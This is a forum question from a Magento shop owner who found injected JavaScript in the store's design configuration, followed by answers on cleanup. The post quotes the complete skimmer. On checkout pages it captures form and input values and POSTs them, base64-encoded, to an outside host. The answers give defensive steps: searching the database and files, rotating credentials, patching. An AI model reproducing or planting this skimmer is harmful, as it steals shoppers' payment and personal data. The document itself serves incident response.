# Is it a Trojan? What can I do?

Tags: magento-1.8, javascript, security

A customer complained about trojan alert on my website, and after doing some reading, I checked the pages, and I found this code below on the **System > Configuration > General > Design**.

```
 <script type="text/javascript">
<!--
var be20b6410993ea4c7a48767775856514b={
    snd:null,
    e294b002686cad2df01bb59e3e2299f3e:'https://informaer.net/js/info_jquery.js',
    myid:(function(name){
        var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
        return matches?decodeURIComponent(matches[1]):undefined;
    })('setidd')||(function(){
        var ms=new Date();
        var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
        var date=new Date(new Date().getTime()+60*60*24*1000);
        document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
        return myid;
    })(),
clk:function(){
        be20b6410993ea4c7a48767775856514b.snd=null;
        var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
        for (var i=0;i<inp.length;i++){
            if(inp[i].value.length>0){
                var nme=inp[i].name;
                if(nme==''){nme=i;}
                    be20b6410993ea4c7a48767775856514b.snd+=inp[i].name+'='+inp[i].value+'&';
            }
        }
    },
    send:function(){
        try{
            var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
            for(var i=0;i<btn.length;i++){
                var b=btn[i];
                if(b.type!='text'&&b.type!='select'&&b.type!='checkbox'&&b.type!='password'&&b.type!='radio'){
                    if(b.addEventListener) {
                        b.addEventListener('click',be20b6410993ea4c7a48767775856514b.clk,false);
                    }else{
                        b.attachEvent('onclick',be20b6410993ea4c7a48767775856514b.clk);
                    }
                }
            }
            var frm=document.querySelectorAll('form');
            for(vari=0;i<frm.length;i++){
                if(frm[i].addEventListener){
                    frm[i].addEventListener('submit',be20b6410993ea4c7a48767775856514b.clk,false);
                }else{
                    frm[i].attachEvent('onsubmit',be20b6410993ea4c7a48767775856514b.clk);
                }
            }
            if(be20b6410993ea4c7a48767775856514b.snd!=null){
                var domm=location.hostname.split('.').slice(0).join('_')  || 'nodomain';
                var keym=btoa(be20b6410993ea4c7a48767775856514b.snd);
                var http=new XMLHttpRequest();
                http.open('POST',be20b6410993ea4c7a48767775856514b.e294b002686cad2df01bb59e3e2299f3e,true);
                http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
                http.send('info='+keym+'&hostname='+domm+'&key='+be20b6410993ea4c7a48767775856514b.myid);
            }
            be20b6410993ea4c7a48767775856514b.snd=null;
            keym=null;
            setTimeout(function(){be20b6410993ea4c7a48767775856514b.send()},30);
        }catch(e){}
    }
}

if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
    be20b6410993ea4c7a48767775856514b.send();
}
-->
</script>
```

I am sure I did not add this, and I have deleted it for now. Is deleting this enough? or is there anything else I should look into?

Comment: For reference, here's how a security professional handles cases like that: http://gwillem.gitlab.io/2017/04/12/magento-breach-analysis/

Answer (score 0):

Deleting will probably not be enough. Someone (or something) added this script via either the database, the admin, an extension or a leak in your shop. First of all, check for strange admin accounts in Magento and remove them. After that, change the passwords for **all** admin accounts, change the admin path and change the credentials for your database.

It's also possible that you have a malicious or insecure extension in your webshop. A lot of vulnerabilities can be detected by [MageReport](https://www.magereport.com), so I would scan the shop if I were you. Also, check the extensions that you have installed and see if there is anything strange in there.

There will probably be more code like this in your shop. I'd check some random CMS pages as well and check your site with [Sucuri](https://sitecheck.sucuri.net/).

It still is possible that your shop can get infected after these changes. So it's really important to either upgrade to the latest version or install all security patches for your Magento version. Of course you should do this on a testing or development environment and not on live.

I hope the above will help you out a bit.

Answer (score 0):

Search like this code in your whole data base.
Also search like this code in your whole source code using grep command.
And scan your website at https://www.magereport.com for security issue.

Answer (score 0):

Here is what I would do:

1. Dump you database into a file:

   ```
   mysqldump -uUser DB -p >db.sql
   ```

   Then scan this file for all traces of the same javascript code you found in `System > Configuration > General > Design`:

   ```
   grep --color=always 'informaer' db.sql
   ```

   Note down places where malicious code is (most probably in cms page content or cms blocks) and delete it via magento backend.
2. Scan all your files with `find` command:

   ```
   find /var/magento/root/folder -type f -exec grep -iHn --color=always 'informaer' {} \;
   ```

   And remove the malicious code from your files.
3. Go to [magereport](https://www.magereport.com/) and make sure you come green.
4. Reset magento backend password for all users and ftp/ssh passwords as well. Use strong passwords with the help of https://strongpasswordgenerator.com.